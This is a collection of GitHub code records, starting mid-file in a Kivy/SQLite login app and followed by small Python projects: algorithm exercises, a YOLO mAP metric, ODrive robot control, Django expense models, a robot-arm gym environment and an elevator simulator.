halign:\"center\"\r\n theme_text_color:\"Custom\"\r\n text_color: 1, 1, 1, 1\r\n font_size:\"35sp\"\r\n MDLabel:\r\n text:\"App by santhoshkumar\"\r\n pos_hint:{\"center_x\": .5, \"center_y\": .15}\r\n halign:\"center\"\r\n theme_text_color:\"Custom\"\r\n text_color: 1, 1, 1, 1\r\n font_size:\"14sp\"\r\n\r\n '''\r\n\r\n\r\nclass ClientsTable(Screen):\r\n def load_table(self):\r\n layout = AnchorLayout()\r\n self.data_tables = MDDataTable(\r\n pos_hint={'center_y': 0.5, 'center_x': 0.5},\r\n size_hint=(0.9, 0.6),\r\n use_pagination=True,\r\n check=True,\r\n column_data=[\r\n (\"No.\", dp(30)),\r\n (\"Head 1\", dp(30)),\r\n (\"Head 2\", dp(30)),\r\n (\"Head 3\", dp(30)),\r\n (\"Head 4\", dp(30)), ],\r\n row_data=[\r\n (f\"{i + 1}\", \"\", \"\", \"\", \"\")\r\n for i in range(50)], )\r\n self.add_widget(self.data_tables)\r\n return layout\r\n\r\n def on_enter(self):\r\n self.load_table()\r\n\r\n\r\nclass MenuScreen(Screen):\r\n pass\r\n\r\n\r\nclass ProfileScreen(Screen):\r\n pass\r\n\r\n\r\nclass UploadScreen(Screen):\r\n pass\r\n\r\n\r\nclass firstpage(Screen):\r\n pass\r\n\r\n\r\nclass LoginScreen(MDScreen):\r\n pass\r\n\r\n\r\nclass SignupScreen(Screen):\r\n pass\r\n\r\n\r\nclass MainApp(MDApp):\r\n\r\n def build(self):\r\n global scr\r\n scr = ScreenManager()\r\n Builder.load_string(s)\r\n conn = sqlite3.connect(\"accounts.db\")\r\n c = conn.cursor()\r\n\r\n c.execute('''CREATE TABLE if not exists accounts \r\n \t\t(uname text, pwd text)''')\r\n conn.commit()\r\n conn.close()\r\n self.theme_cls.primary_palette = \"Orange\"\r\n scr.add_widget((Builder.load_string(LO)))\r\n\r\n scr.add_widget((Builder.load_string(LO)))\r\n scr.add_widget(MenuScreen(name='menu'))\r\n scr.add_widget(ProfileScreen(name='profile'))\r\n scr.add_widget(UploadScreen(name='upload'))\r\n 
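# build() above creates the accounts table once at startup, and the create() and
# log() handlers that follow insert and look up rows with parameterized queries,
# binding user input as values instead of splicing it into the SQL string.
# A self-contained round-trip of that flow against a throwaway in-memory database:
import sqlite3

conn = sqlite3.connect(':memory:')   # disposable database for illustration only
c = conn.cursor()
c.execute('CREATE TABLE if not exists accounts (uname text, pwd text)')
c.execute('INSERT INTO accounts VALUES (?, ?)', ['alice', 'secret'])
row = c.execute('SELECT * FROM accounts WHERE uname=? and pwd=?',
                ['alice', 'secret']).fetchone()
assert row == ('alice', 'secret')
conn.close()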
scr.add_widget(LoginScreen(name='login'))\r\n        scr.add_widget(SignupScreen(name='signup'))\r\n        scr.add_widget(ClientsTable(name='Clientstable'))\r\n        scr.add_widget(firstpage(name='new'))\r\n        return scr\r\n\r\n    def navigation_draw(self):\r\n        pass\r\n\r\n    def on_start(self):\r\n        Clock.schedule_once(self.login, 3)\r\n\r\n    def login(self, *args):\r\n        scr.current = \"login\"\r\n\r\n    def create(self, *args):\r\n        add = self.root.get_screen('signup')\r\n        email = add.ids[\"email\"].text\r\n        password = add.ids[\"password\"].text\r\n        if (email == ''):\r\n            self.dialog = MDDialog(\r\n                title=\"INVALID LOGIN\",\r\n                text=\"Please enter a correct login id\",\r\n                size_hint=(0.7, 1),\r\n                radius=[20, 7, 20, 7],\r\n                buttons=[\r\n                    MDFlatButton(\r\n                        text=\"OK\",\r\n                        theme_text_color=\"Error\",\r\n                        text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n                    ),\r\n                    MDFlatButton(\r\n                        text=\"CANCEL\",\r\n                        theme_text_color=\"Custom\",\r\n                        text_color=self.theme_cls.primary_color,\r\n                    )\r\n                    , ], )\r\n            self.dialog.open()\r\n\r\n        else:\r\n            conn = sqlite3.connect('accounts.db')\r\n            c = conn.cursor()\r\n            c.execute(\"INSERT INTO accounts VALUES (?, ?)\", [email, password])\r\n\r\n            self.dialog = MDDialog(\r\n                title=\"SUCCESSFULLY CREATED\",\r\n                text=\"CLICK BACK TO LOGIN PAGE\",\r\n                size_hint=(0.7, 1),\r\n                radius=[20, 7, 20, 7],\r\n                buttons=[\r\n                    MDFlatButton(\r\n                        text=\"OK\",\r\n                        theme_text_color=\"Error\",\r\n                        text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n                    ), ], )\r\n            self.dialog.open()\r\n            conn.commit()\r\n            conn.close()\r\n\r\n    def log(self, *args):\r\n        new = self.root.get_screen('login')\r\n        email = new.ids[\"email\"].text\r\n        password = new.ids[\"password\"].text\r\n        conn = sqlite3.connect('accounts.db')\r\n        c = conn.cursor()\r\n        c.execute(\"SELECT * FROM accounts WHERE uname=? 
and pwd=?\", [email, password])\r\n if c.fetchone() == None:\r\n\r\n self.dialog = MDDialog(\r\n title=\"INVALID LOGIN\",\r\n text=\"Please enter correct id and password\",\r\n size_hint=(0.7, 1),\r\n radius=[20, 7, 20, 7],\r\n buttons=[\r\n MDFlatButton(\r\n text=\"OK\",\r\n theme_text_color=\"Error\",\r\n text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n )\r\n , ], )\r\n self.dialog.open()\r\n else:\r\n self.dialog = MDDialog(\r\n title=\"WELCOME\",\r\n text=email,\r\n size_hint=(0.7, 1),\r\n radius=[20, 7, 20, 7],\r\n buttons=[\r\n MDFlatButton(\r\n text=\"OK\",\r\n theme_text_color=\"Error\",\r\n text_color=self.theme_cls.primary_color, on_release=self.closeDialog\r\n ), ], )\r\n self.dialog.open()\r\n scr.current = 'menu'\r\n conn.commit()\r\n conn.close()\r\n\r\n def closeDialog(self, inst):\r\n self.dialog.dismiss()\r\n\r\n def add_record(self):\r\n new = self.root.get_screen('Clientstable')\r\n matter = new.ids[\"matter_name\"].text\r\n file_name = new.ids[\"file_name\"].text\r\n description = new.ids[\"description\"].text\r\n location = new.ids[\"location\"].text\r\n conn = sqlite3.connect(\"records.db\")\r\n c = conn.cursor()\r\n c.execute(\r\n \"CREATE TABLE IF NOT EXISTS records (id INTEGER PRIMARY KEY, matter text, filename text, description text, location text)\")\r\n c.execute(\"INSERT INTO records VALUES (NULL, ?, ?, ?, ?)\", (matter, file_name, description, location))\r\n conn.commit()\r\n\r\n def update_record(self):\r\n new = self.root.get_screen('Clientstable')\r\n matter = new.ids[\"matter_name\"].text\r\n file_name = new.ids[\"file_name\"].text\r\n description = new.ids[\"description\"].text\r\n location = new.ids[\"location\"].text\r\n conn = sqlite3.connect(\"records.db\")\r\n c = conn.cursor()\r\n c.execute(\"INSERT INTO records VALUES (NULL, ?, ?, ?, ?)\", (matter, file_name, description, location))\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n MainApp().run()\r\n","repo_name":"santhoshkumarlabs/withkivysqlite3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73093576362","text":"# Uses python3\nimport sys\n\ndef fibonacci_sum_naive(n):\n if n <= 1:\n return n\n\n previous = 0\n current = 1\n sum = 1\n\n for _ in range(n - 1):\n previous, current = current, previous + current\n sum += current\n\n return sum % 10\n\n\ndef get_fibonacci_huge(n,m):\n previous = 0\n current = 1\n \n for i in range(m*m):\n previous, current = current, (current+previous)%m\n if (previous, current) == (0,1):\n period = i + 1\n break\n\n j = n%period\n\n if j == 0:\n return j\n else:\n previous = 0\n current = 1\n for i in range (2, j+1):\n previous, current = current, (current+previous)%m\n return current\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n # print(fibonacci_sum_naive(n))\n print((get_fibonacci_huge(n+2,10)-1)%10)\n","repo_name":"etherion-1337/Data_Structure_Algo_UCSD","sub_path":"Course_1_Algorithmic_Toolbox/week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers/fibonacci_sum_last_digit.py","file_name":"fibonacci_sum_last_digit.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4964529855","text":"import torch\nfrom tools.utils import intersection_over_union\n\n\ndef mean_average_precision(pred_boxes, true_boxes, classes, 
iou_threshold=0.5) -> float:\n \"\"\"\n Mean Average Precision of bounding boxes.\n\n param: pred_boxes - predicted bounding boxes\n param: true_boxes - true bounding boxes\n param: classes - number of classes\n param: iou_threshold - threshold of IOU (default = 0.5)\n\n return: calculated mAP\n \"\"\"\n\n average_precisions = []\n\n for current_class in range(classes):\n FP = 0\n FN = 0\n TP = 0\n precisions = []\n recalls = []\n\n for i in range(len(true_boxes)):\n FN += len([box for box in true_boxes[i] if box[5] == current_class])\n\n for i in range(len(pred_boxes)):\n pred_boxes_class = [box for box in pred_boxes[i] if torch.argmax(box[5:]) == current_class]\n true_boxes_class = [box for box in true_boxes[i] if box[5] == current_class]\n for k in range(len(pred_boxes_class)):\n max_iou = 0\n max_index = 0\n for j in range(len(true_boxes_class)):\n if intersection_over_union(pred_boxes_class[k], true_boxes_class[j]).item() > max_iou:\n max_iou = intersection_over_union(pred_boxes_class[k], true_boxes_class[j]).item()\n max_index = j\n\n if max_iou < iou_threshold:\n FP += 1\n else:\n TP += 1\n FN -= 1\n true_boxes_class.pop(max_index)\n\n precisions.append(TP / (TP + FP))\n recalls.append(TP / (TP + FN))\n\n precisions = torch.tensor(precisions)\n recalls = torch.tensor(recalls)\n average_precisions.append(torch.trapezoid(precisions, recalls))\n\n return sum(average_precisions) / len(average_precisions)\n","repo_name":"AlexeyDate/YOLOv2","sub_path":"tools/mAP.py","file_name":"mAP.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"21087109338","text":"from PySide6 import QtWidgets as qtw\nfrom PySide6 import QtCore as qtc\nfrom PySide6 import QtGui as qtg\nimport sys\n\n\nclass Caja(qtw.QLabel):\n def __init__(self, color):\n super(Caja, self).__init__()\n self.setStyleSheet(f\"background-color: {color}\")\n\n\nclass MainWindow(qtw.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n layout = qtw.QHBoxLayout()\n layout.addWidget(Caja(\"green\"))\n layout.addWidget(Caja(\"blue\"))\n layout.addWidget(Caja(\"red\"))\n layout.setContentsMargins(0, 0, 0, 0)\n layout.setSpacing(0)\n\n widget = qtw.QWidget()\n widget.setLayout(layout)\n\n self.setCentralWidget(widget)\n\n\nif __name__ == \"__main__\":\n app = qtw.QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec())\n","repo_name":"ferreret/curso_qt_pyside","sub_path":"04 Formas de organización/4-2 Layouts básicos/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10130290282","text":"\"\"\"\nThis is the main test .py file for our RMC system. 
It references all of the other files to pull in the functionality of each subsystem.\n\n@created: 10-4-2020\n\"\"\"\nimport odrive\nimport time\nimport math\n\nfrom odrive.enums import *\nfrom pynput import keyboard\n\n#from locomotion import locomotion_funcs\n#from digging import digging_funcs\n#from dumping import dumping_funcs\n#from lidar import lidar_funcs\n\ndef key_press(key):\n    \"\"\"\n    This function reads a key press in order to perform an action.\n    \n    Args:\n        key (Key or KeyCode): the key object passed in from the listener\n    \n    Returns:\n        Returning False will end the listener and all keyboard inputs, otherwise it will continue\n    \"\"\"\n    if key == keyboard.Key.esc:\n        return False\n    \n    try:\n        k = key.char # meant for single character keys - w, a, s, d etc.\n    except:\n        k = key.name # meant for other keys - arrow keys, space bar, return etc.\n    \n    # elif statements look for the key pressed and perform the action within; multiple keys can be programmed to the same action\n    # in the array of characters\n    if k in ['w']:\n        odrv0.axis0.controller.input_vel = -50\n        odrv0.axis1.controller.input_vel = 50\n    \n    elif k in ['a']:\n        odrv0.axis0.controller.input_vel = 50\n        odrv0.axis1.controller.input_vel = 50\n    \n    elif k in ['s']:\n        odrv0.axis0.controller.input_vel = 50\n        odrv0.axis1.controller.input_vel = -50\n    \n    elif k in ['d']:\n        odrv0.axis0.controller.input_vel = -50\n        odrv0.axis1.controller.input_vel = -50\n    \n    elif k in ['space']:\n        odrv0.axis0.controller.input_vel = 0\n        odrv0.axis1.controller.input_vel = 0\n\ndef main():\n    global odrv0  # key_press() drives the motors through this handle, so it must be module-level\n    print(\"Finding odrive(s) this may take a few seconds...\")\n    try:\n        odrv0 = odrive.find_any(serial_number=\"206430804648\")\n        #odrv1 = odrive.find_any(serial_number=\"20863880304E\")\n    except:\n        print(\"finding odrive failed.\")\n        return  # without a connected ODrive the key handler would crash on odrv0\n    \n    print(\"It is time to control the robot!\\nThe controls are simple: wasd to move the robot directionally.\")\n    print(\"Space will stop the robot in its tracks, and escape will end the control period altogether.\")\n    listener = keyboard.Listener(on_press=key_press)\n    listener.start()\n    listener.join()\n    print(\"Ending program.\")\n    \n    \nif __name__ == '__main__':\n    main()","repo_name":"JMur2/MarquetteRMC2021","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"71774504044","text":"from decimal import Decimal\n\nfrom django.db import models\nfrom django.db.models import Q, F, Sum\nfrom django.contrib.auth import get_user_model\nfrom django.core.validators import MinValueValidator\n\nfrom groups.models import Group\n\nUser = get_user_model()\n\n\nclass ExpenseManager(models.Manager):\n    def create_expense(self, data, creator):\n        expense = self.create(\n            description=data[\"description\"],\n            creator=creator,\n            group=Group.objects.get(pk=data[\"group_pk\"]),\n            total_cost=Decimal(data[\"total_cost\"]).quantize(Decimal(\".00\")),\n        )\n        for participant in data[\"participants\"]:\n            user = User.objects.get(email=participant[0])\n            expense.participants.add(\n                user,\n                through_defaults={\n                    \"share\": Decimal(participant[1]).quantize(Decimal(\".00\")),\n                    \"paid\": Decimal(participant[2]).quantize(Decimal(\".00\")),\n                },\n            )\n        return expense\n\n\n# Create your models here.\nclass Expense(models.Model):\n    description = models.TextField()\n    participants = models.ManyToManyField(\n        User, through=\"Share\", related_name=\"participants\", related_query_name=\"participants\"\n    )\n    creator = 
models.ForeignKey(User, null=True, on_delete=models.SET_NULL)\n group = models.ForeignKey(Group, null=True, on_delete=models.SET_NULL)\n created = models.DateTimeField(auto_now_add=True)\n total_cost = models.DecimalField(\n default=0.00, max_digits=12, decimal_places=2, validators=[MinValueValidator(0.00)]\n )\n\n objects = ExpenseManager()\n\n def get_debtors(self):\n return Share.objects.filter(expense=self, paid__lt=F(\"share\")).order_by(\"user\").values(\"user\", \"share\", \"paid\")\n\n def get_creditors(self):\n return Share.objects.filter(expense=self, paid__gt=F(\"share\")).order_by(\"user\").values(\"user\", \"share\", \"paid\")\n\n def get_totoal_transfer_amount(self):\n debtors = self.get_debtors()\n return sum([debtor[\"share\"] - debtor[\"paid\"] for debtor in debtors])\n\n def __str__(self):\n return self.description\n\n\nclass ShareManger(models.Manager):\n def get_spent(self, user):\n return self.filter(user=user).aggregate(Sum(\"share\"))[\"share__sum\"] or 0\n\n def get_group_most_share(self, user):\n expense_per_group = self.filter(user=user).values(\"expense__group\").annotate(Sum(\"share\"))\n expense_per_group = [\n (str(Group.objects.get(pk=_[\"expense__group\"])), float(_[\"share__sum\"])) for _ in expense_per_group\n ][:4]\n sum_expense_per_group = sum([_[1] for _ in expense_per_group])\n expense_per_group.append((\"other\", float(self.get_spent(user)) - sum_expense_per_group))\n return expense_per_group\n\n\nclass Share(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n expense = models.ForeignKey(Expense, on_delete=models.CASCADE)\n share = models.DecimalField(default=0.00, max_digits=12, decimal_places=2, validators=[MinValueValidator(0.00)])\n paid = models.DecimalField(default=0.00, max_digits=12, decimal_places=2, validators=[MinValueValidator(0.00)])\n\n objects = ShareManger()\n\n class Meta:\n unique_together = [[\"user\", \"expense\"]]\n","repo_name":"farhad-rezazadeh/bdong","sub_path":"expenses/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27801917101","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 15 23:03:34 2017\n\n@author: root\n\"\"\"\n\ncube = 56665\nepi = 0.01\nng = 0\nlow = 0.0\nhigh = cube\nguess = (high + low)/2.0\n\nwhile abs(guess**3 - cube) >= epi:\n if guess**3 < cube:\n low = guess\n else:\n high = guess\n guess = (high + low)/2.0\n ng += 1\nprint(\" Num Guesses: \" + str(ng))\nprint(str(guess) + \" is close to cuberoot of \" + str(cube))","repo_name":"goforaditya/MIT-Python-Programming","sub_path":"5. loops guess approx bisec/cuberootbisection.py","file_name":"cuberootbisection.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37780953607","text":"\"\"\"\nImplements a gym environment for the robot arm. 
\nThe environment is used for simulation and imitation learning.\n\"\"\"\nimport sys\nimport os\nproject_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(project_root)\n\nimport numpy as np\nfrom typing import Tuple\nimport gym\nfrom gym import spaces\nfrom model.iiwa14_model import Symbolic_model\nfrom simulation.simulation import Simulator, SimulatorOptions\n\nclass iiwa14EnvOptions:\n \n def __init__(self,dt:float,x_start: np.ndarray,x_end: np.ndarray,\n sim_time: float,sim_noise_R: np.ndarray,contr_input_state: str) -> None:\n \n if dt is None:\n self.dt = 0.01\n else:\n self.dt = dt \n # x_start is used to set the initial state of the robot, if None a random state is sampled in reset()\n if x_start is None:\n self.x_start = None\n else:\n self.x_start = x_start\n \n if x_end is None:\n self.x_end: np.ndarray = np.array([1.8,0.5,-0.2,-0.55,1.25,-1.2,0.25,0,0,0,0,0,0,0]).reshape(14,1)\n else:\n self.x_end = x_end\n \n if sim_time is None:\n self.sim_time = 2 \n else:\n self.sim_time = sim_time\n \n if sim_noise_R is None:\n self.sim_noise_R = None\n else:\n self.sim_noise_R = sim_noise_R\n \n if contr_input_state is None:\n self.contr_input_state = 'real'\n else:\n self.contr_input_state = contr_input_state\n \n self.render_mode = None\n self.maximum_torques: np.ndarray = np.array([50,100,10,50,5,5,1])\n self.goal_dist_euclid: float = 0.01\n self.goal_min_time: float = 1 \n\n\nclass iiwa14Env(gym.Env):\n \n def __init__(self,options: iiwa14EnvOptions) -> None:\n self.options = options\n self.sim_model = Symbolic_model()\n self.dt = self.options.dt\n self._state = self.options.x_start\n self.x_final= self.options.x_end\n self.pee_final = self.sim_model.forward_kinemetics(self.x_final[0:7])\n self.max_intg_steps = int(self.options.sim_time/self.options.dt)\n self.no_intg_steps = 0\n \n # define simulator\n sim_opts = SimulatorOptions(\n dt = self.dt,\n n_iter = self.max_intg_steps,\n R = self.options.sim_noise_R,\n contr_input_state = self.options.contr_input_state\n )\n self.simulator = Simulator(self.sim_model, controller=None, integrator='cvodes', opts = sim_opts)\n \n # define action and observation space\n nx_ = self.sim_model.nx\n self.observation_space = spaces.Box(np.array([-np.pi * 200] * nx_),np.array([np.pi * 200] * nx_),dtype=np.float64)\n self.action_space = spaces.Box(-options.maximum_torques, options.maximum_torques,dtype=np.float64)\n \n self.render_mode = self.options.render_mode\n self.goal_dist_counter = 0\n self.stop_if_goal_reached = True\n \n def reset(self):\n if self._state is None:\n self._state = self.sample_rand_config()\n \n self.simulator.reset(x0=self._state)\n self.no_intg_steps = 0\n \n return self._state\n \n def step(self,a) -> Tuple[np.ndarray, float, bool, dict]:\n \n self._state = self.simulator.step(a)\n \n self.no_intg_steps += 1\n \n # define reward as Euclidian distance to goal\n pee_current = self.sim_model.pee(self._state[:int(self.sim_model.nq)]) \n dist = np.linalg.norm(pee_current - self.pee_final,2) \n reward = -dist * self.options.dt\n \n # check if goal is reached\n done = bool(self.terminal(dist))\n \n observation = self._state[:,0]\n \n info = {}\n return(observation, reward, done, info)\n \n def step_mix_with_policy(self,a,mixture_ratio,agent)-> Tuple[np.ndarray, float, bool, dict]:\n obs = self._state[:,-1].reshape(1,14)\n print(obs)\n predictions = agent.get_action(obs)\n predictions = predictions\n \n self._state = self.simulator.mix_step(a,predictions.reshape(1,7),mixture_ratio)\n 
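        # mix_step() blends the expert command a with the learned policy's
        # prediction according to mixture_ratio (DAgger-style execution),
        # presumably something like
        #   u = mixture_ratio * a + (1 - mixture_ratio) * prediction.
        # The exact blending rule lives in Simulator.mix_step in
        # simulation.simulation, so the linear form above is an assumption,
        # not something this file guarantees.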
print(self._state)\n self.no_intg_steps += 1\n \n # define reward as Euclidian distance to goal\n pee_current = self.sim_model.pee(self._state[:int(self.sim_model.nq)]) \n dist = np.linalg.norm(pee_current - self.pee_final,2) \n reward = -dist * self.options.dt\n \n # check if goal is reached\n done = bool(self.terminal(dist))\n \n observation = self._state[:,0]\n print(observation)\n \n info = {}\n return(observation, reward, done, info)\n \n \n \n def terminal(self,dist:float):\n if dist < self.options.goal_dist_euclid:\n self.goal_dist_counter += 1\n else:\n self.goal_dist_counter = 0\n \n done = False\n \n if (self.goal_dist_counter >= self.options.goal_min_time/self.options.dt) and self.stop_if_goal_reached:\n done = True\n if self.no_intg_steps >= self.max_intg_steps:\n done = True\n return bool(done)\n \n def sample_rand_config(self): \n q = []\n q_range = np.deg2rad([170,120,170,120,170,120,175])\n alpha = 0.3\n np.random.seed(3)\n for limit in q_range:\n single_joint = np.random.uniform(alpha * limit, -alpha * limit)\n q.append(single_joint)\n q = np.array(q).reshape(7,1)\n dq = np.zeros((7,1))\n x = np.vstack((q,dq))\n print(\"initial_state:\",x)\n return x \n \nif __name__ == \"__main__\":\n env_options = iiwa14EnvOptions(dt=0.01,x_start=None,x_end=None,\n sim_time=3,sim_noise_R=None,contr_input_state=None)\n env = iiwa14Env(env_options)\n x_start = env.reset()\n print(x_start)\n next_observation,reward,done,_ = env.step(np.array([25,25,25,25,25,25,25]))\n print(next_observation)\n print(reward)\n print(done)","repo_name":"wenxin0917/Imitation-Learning-of-MPC-for-LBR-iiwa-14","sub_path":"environment/gym_env.py","file_name":"gym_env.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35905862040","text":"from sw_app.db import db\nfrom sw_app.catalog.models import Product\n\ndef add_data():\n test_data = [{'cat': 'Категория1', 'title': 'Название1', 'number': '45', 'articul': '123456', 'price': '4589',\n 'description': 'Описание1'},\n {'cat': 'Категория2', 'title': 'Название2', 'number': '56', 'articul': '456987', 'price': '1025',\n 'description': 'Описание2'},\n {'cat': 'Категория3', 'title': 'Название3', 'number': '99', 'articul': '754123', 'price': '7865',\n 'description': 'Описание3'}, ]\n for data in test_data:\n cat = data['cat']\n title = data['title']\n number = data['number']\n articul = data['articul']\n price = data['price']\n description = data['description']\n\n data_test(cat, title, number, articul, price, description)\n\n\ndef data_test(cat, title, number, articul, price, description):\n new_product = Product(cat=cat, title=title, number=number, articul=articul, price=price, description=description)\n db.session.add(new_product)\n db.session.commit()","repo_name":"MuRash33/shop_web","sub_path":"test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45046490188","text":"__author__ = 'Ciaran'\n\"\"\"\nObject orientated programming\nAaignment 2\nDate:3/04/2015\nThe aim of this assignment was to create a lift simulator using 3 classes, Building, person, and elevator.\nMy program is relatively simple with all the necessary code contained within main()\nThe elevator starts off at a random floor with the user entering the number of floors and the number of people in the building\nwanting to use the elevator.\nThe program outputs the 
location of the people in the building and where they want to go before the elevator starts moving; after this the elevator is shown moving towards\nthe first customer.\nIt goes through all of the customers, and when every customer is where they want to be the simulation ends.\n\n\n\n\"\"\"\nimport random\nimport time\n\nclass Building(object):\n    \"\"\"Docstring for the class Building\n    This class is fairly simple: it holds the variables for the building, i.e. how many people are in the building, how many floors\n    are in the building etc.\"\"\"\n    def __init__(self,no_elevators,no_floors,no_people ):\n        self.no_elevators=no_elevators\n        self.no_floors=no_floors\n        self.no_people=no_people\n\n\n\n\nclass Elevator(object):\n    \"\"\"Again this is fairly simple: this is the elevator class and it holds the data for what floor the elevator is on and how many people are in the\n    elevator\n    \"\"\"\n    current_floor=1\n    def __init__(self,no_people_elevator=0,current_floor=1,next_floor=0 ):\n        self.no_people_elevator=no_people_elevator\n        self.current_floor=current_floor\n        self.next_floor=next_floor\n\n\nclass Person(object):\n    \"\"\"This is the class for people; it holds the id number for the instance of the class as well as generating a random floor for the person\n    to be on and a random floor for them to want to go to. It also holds the flag for whether the person is waiting for the elevator,\n    whether they are in the elevator or whether they have been delivered\n    \"\"\"\n    def __init__(self,id,current_floor=0,wanted_floor=0,in_elevator=0):\n        self.id=id\n        self.current_floor=random.randint(1,Building.no_floors)#code to generate a random floor for the person to be on\n        self.wanted_floor=random.randint(1,Building.no_floors)#code to generate a random floor for them to want to go to\n        self.in_elevator=in_elevator#flag\n\n\ndef main():#main program\n    cus_list=[]\n    current_floor=[]\n    wanted_floor=[]\n    in_elevator=[]\n    check1=0\n\n    while(check1==0):#Loop to validate user input; if the user enters an invalid character they get a message telling them so\n        try:\n            Building.no_people=int(input(\"How many Customers will there be?\"))\n            Building.no_floors=int(input(\"How many Floors will there be?\"))\n            check1=1\n        except ValueError:\n            print(\"Invalid input, please input a number\")\n\n\n    Elevator.current_floor=random.randint(1,Building.no_floors)#random floor for the elevator to start on\n\n    j=-1\n    for i in range (1,int(Building.no_people)+1):#creates multiple instances of a person\n        cus_list.append(Person(i))\n\n    for i in range (1,int(Building.no_people)+1):#Places random values into variables for the instances of the person\n        current_floor.append(Person(i).current_floor)\n        wanted_floor.append(Person(i).wanted_floor)\n        in_elevator.append(Person(i).in_elevator)\n\n    check=0\n    for i in range (1,int(Building.no_people)+1):#This is the main part of the program\n        in_elevator[j]=0\n        j+=1\n        k=-1\n        if check==0:\n            for i in range (1,int(Building.no_people)+1):#prints the location of each person in the building and where they want to go\n                k+=1\n                print(\"Current position of customer\",current_floor[k])\n                print(\"Current position of wanted floor\",wanted_floor[k])\n            check=1\n\n        print(\"Elevator Current Position\",Elevator.current_floor)\n        while in_elevator[j]!=2:#loop for the elevator; will end when everyone has got to their desired floors\n            k=-1\n            for i in range (1,int(Building.no_people)+1):#go through every person and see if anyone is at the floor and wants to get on\n                k+=1\n                if Elevator.current_floor==current_floor[k] and in_elevator[k]!=1 and in_elevator[k]!=2:#checks to see if the person here has already gotten on or has\n                    # already been delivered\n                    in_elevator[k]=1#sets their flag\n                    print(\"Person Collected\")\n                #checks through all the people to see if any of them have to get off at the current floor\n                if Elevator.current_floor==wanted_floor[k] and in_elevator[k]==1:\n                    in_elevator[k]=2\n                    print(\"Person Dropped off\")\n\n            if Elevator.current_floor<current_floor[j] and in_elevator[j]!=1 and in_elevator[j]!=2:#checks to see if the next customer is above the elevator\n                k=-1\n                Elevator.current_floor+=1\n                time.sleep(.5)\n                print(\"Elevator Current Position\",Elevator.current_floor)\n\n            elif Elevator.current_floor>current_floor[j] and in_elevator[j]!=1 and in_elevator[j]!=2:#checks to see if they are below the elevator\n                k=-1\n                Elevator.current_floor-=1\n                time.sleep(.5)\n                print(\"Elevator Current Position\",Elevator.current_floor)\n\n\n\n            if Elevator.current_floor==wanted_floor[j] and in_elevator[j]==1:\n                in_elevator[j]=2\n                print(\"Person Dropped off\")\n                k=-1\n\n\n\n            elif Elevator.current_floor<wanted_floor[j] and in_elevator[j]==1:#checks to see if the elevator has to go up to deliver someone\n                Elevator.current_floor+=1\n                time.sleep(.5)\n                print(\"Elevator Current Position\",Elevator.current_floor)\n                k=-1\n                for i in range (1,int(Building.no_people)+1):\n                    k+=1\n                    if Elevator.current_floor==wanted_floor[k] and in_elevator[k]==1:\n                        in_elevator[k]=2\n                        print(\"Person Dropped off\")\n\n            elif Elevator.current_floor>wanted_floor[j] and in_elevator[j]==1:#checks to see if the elevator has to go down to deliver someone\n                Elevator.current_floor-=1\n                time.sleep(.5)\n                print(\"Elevator Current Position\",Elevator.current_floor)\n                k=-1\n                for i in range (1,int(Building.no_people)+1):\n                    k+=1\n                    if Elevator.current_floor==wanted_floor[k] and in_elevator[k]==1:\n                        in_elevator[k]=2\n                        print(\"Person Dropped off\")\n\n\n\n\nmain()#starts the program","repo_name":"ErikGrunner/College-Year-2","sub_path":"Programming Semester 2/Assignment/Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
